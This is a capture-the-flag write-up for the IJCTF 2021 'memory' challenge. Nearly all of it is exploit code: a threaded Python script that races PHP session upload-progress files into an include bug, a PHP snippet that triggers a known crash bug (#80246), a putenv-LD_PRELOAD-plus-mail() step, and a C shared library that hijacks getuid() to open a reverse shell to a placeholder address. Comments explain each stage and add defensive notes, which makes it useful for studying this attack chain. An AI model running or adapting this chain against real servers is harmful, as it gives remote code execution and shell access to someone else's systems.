IJCTF 2021 - memory writeup
import sys | |
import string | |
import requests | |
from base64 import b64encode | |
from random import sample, randint | |
from multiprocessing.dummy import Pool as ThreadPool | |
# Challenge endpoint. Both header sets pin a fixed PHPSESSID so the
# server-side session file path is predictable: sess_ab24 is what runner1 /
# runner2 pass through the `bonus` parameter, sess_ab25 is what runner3 uses.
HOST = "http://34.131.30.75:31337/"
headers = {
    'Connection': 'Close',
    'Cookie': 'PHPSESSID=ab24'
}
headers2 = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=ab25'
}
# Stage-1 body: exploit.php is sent as the PHP_SESSION_UPLOAD_PROGRESS form
# field (see runner1). PHP's session.upload_progress feature stores that field
# in the session file while an upload is in flight, which is what turns a
# path-controlled include into code execution here. Defensive note: setting
# session.upload_progress.enabled=Off, and never passing user-controlled paths
# to include/require, removes this primitive. The handle opened here is never
# closed.
payload = open('./exploit.php','rb').read()
# Not used anywhere in this script as shown.
path = ""
def runner1(i: int) -> None:
    """Stage-1 worker: repeatedly uploads hack.so while the session file is
    being populated.

    Every request carries exploit.php in the PHP_SESSION_UPLOAD_PROGRESS
    field, names the target's own session file (sess_ab24) as the `bonus`
    include path, and sets `error=1` so the error-handler branch of
    exploit.php runs. Loops forever; `i` is only the thread-pool index and
    is not used.
    """
    url = "http://34.131.30.75:31337/"  # unused; HOST is used below instead
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload
    }
    while 1:
        # The file is re-opened per request so each multipart body carries the
        # full .so contents.
        fp = open('./hack.so', 'rb')
        r = requests.post(HOST+'/?bonus=/var/lib/php/sessions/sess_ab24&error=1', files={'f': fp}, data=data, headers=headers)
        fp.close()
        print(r.text)
def runner2(i: int) -> None:
    """Stage-2 worker: polls the target with the sess_ab24 session file as
    the `bonus` parameter and prints any non-empty response body.

    Loops forever; `i` is only the thread-pool index and is not used.
    """
    filename = '/var/lib/php/sessions/sess_ab24'
    while 1:
        url = '%s?bonus=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.text
        if c:
            print(c)
def runner3(i: int) -> None:
    """Stage-3 worker: the same session-file technique against a second
    session (sess_ab25), with the module-level `payload2` (built in the argv
    dispatch below) as the PHP_SESSION_UPLOAD_PROGRESS value.

    `/etc/passwd` only serves as an arbitrary file body for the multipart
    upload; the handle is opened once and shared by every iteration. Loops
    forever; `i` is only the thread-pool index and is not used.
    """
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': payload2
    }
    fp = open('/etc/passwd', 'rb')
    filename = '/var/lib/php/sessions/sess_ab25'
    while 1:
        url = '%s?bonus=%s' % (HOST, filename)
        r = requests.post(url, files={'f': fp}, data=data, headers=headers2)
        c = r.text
        if c:
            print(c)
# Pick the worker from argv[1] (no argument at all raises IndexError). Any
# value other than '1' or '2' selects stage 3 and builds payload2: a PHP
# snippet that sets LD_PRELOAD to argv[2] with putenv() and then calls
# mail(). mail() launches the configured sendmail binary, which inherits the
# process environment, so the preloaded library (hack.so; see getuid() in
# hack.c) is mapped into that child. Defensive note: this putenv()+mail()
# pattern is a long-known PHP hardening gap; listing putenv and mail in
# disable_functions, and restricting outbound connections from the web tier,
# are the usual mitigations.
if sys.argv[1] == '1':
    runner = runner1
elif sys.argv[1] == '2':
    runner = runner2
else:
    payload2 = f"""
<?php
putenv('LD_PRELOAD={sys.argv[2]}');mail('a','a','a','a');
?>
"""
    runner = runner3
# 32 concurrent copies of the selected worker. get(0xffff) is simply a long
# timeout so the main thread stays blocked on workers that never return.
pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)
<?php
#https://bugs.php.net/bug.php?id=80246
#segfault -> bypass removing tmpfile
# Stage-1 include body. When ?error=1 is set, an error handler that writes to
# the very variable being operated on is installed, then a string-offset
# access on $my_var is meant to raise the warning that invokes it. The bug
# report above describes this handler-modifies-operand pattern crashing the
# PHP worker; the author's stated intent is that the crash happens before
# request-shutdown cleanup, so the uploaded temp file / session progress data
# survive on disk. Defensive note: a PHP build patched for #80246 closes the
# crash, and not including user-controlled paths removes the entry point.
if($_GET['error']){
    set_error_handler(function() use(&$my_var) {
        $my_var = 0;
    });
    $my_var = 'nual';
    $my_var["foo"];
}
?>
#include <sys/socket.h> | |
#include <netinet/in.h> | |
#include <arpa/inet.h> | |
#include <netdb.h> | |
#include <unistd.h> | |
#include <errno.h> | |
/* | |
gcc -c -fPIC hack.c -o hack | |
gcc -shared hack -o hack.so | |
*/ | |
/*
 * Reverse-shell routine: opens a TCP socket (protocol 6 = IPPROTO_TCP) to the
 * hard-coded "ip":1234 placeholders left by the author, points fds 0/1/2 at
 * it with dup2(), and replaces the process image with /bin/sh via execve().
 * No return value of socket()/connect()/dup2()/execve() is checked, so on
 * failure the function simply falls through and returns.
 * Defensive note: the observable pattern is a web-server or sendmail child
 * making an outbound TCP connection and then exec'ing /bin/sh; egress
 * filtering and execve auditing on the web tier are the natural controls.
 */
void payload() {
    struct sockaddr_in serveraddr;
    int server_sockfd;
    int client_len;
    char buf[80],rbuf[80], *cmdBuf[2]={"/bin/sh",(char *)0};  /* buf/rbuf are unused */
    server_sockfd = socket(AF_INET, SOCK_STREAM, 6);
    serveraddr.sin_family = AF_INET;
    serveraddr.sin_addr.s_addr = inet_addr("ip");
    serveraddr.sin_port = htons(atoi("1234"));
    client_len = sizeof(serveraddr);
    connect(server_sockfd, (struct sockaddr*)&serveraddr, client_len);
    dup2(server_sockfd, 0);
    dup2(server_sockfd, 1);
    dup2(server_sockfd, 2);
    execve("/bin/sh",cmdBuf,0);
}
/*
 * Override of libc's getuid(). When this object is injected with LD_PRELOAD
 * (in this write-up: into the sendmail binary spawned by PHP's mail()), the
 * first getuid() call lands here. If LD_PRELOAD is absent the function just
 * reports uid 0 and does nothing else; otherwise it unsets LD_PRELOAD --
 * presumably so the shell spawned below is not hooked again -- and calls
 * payload(), which does not come back when execve() succeeds. There is no
 * return statement on that path. The real libc getuid() is never consulted.
 * Defensive note: monitoring LD_PRELOAD in the environment of web-server
 * children and alerting on shared objects that export libc symbol names are
 * standard detections for this preload technique.
 */
uid_t getuid() {
    if (getenv("LD_PRELOAD") == NULL) { return 0; }
    unsetenv("LD_PRELOAD");
    payload();
}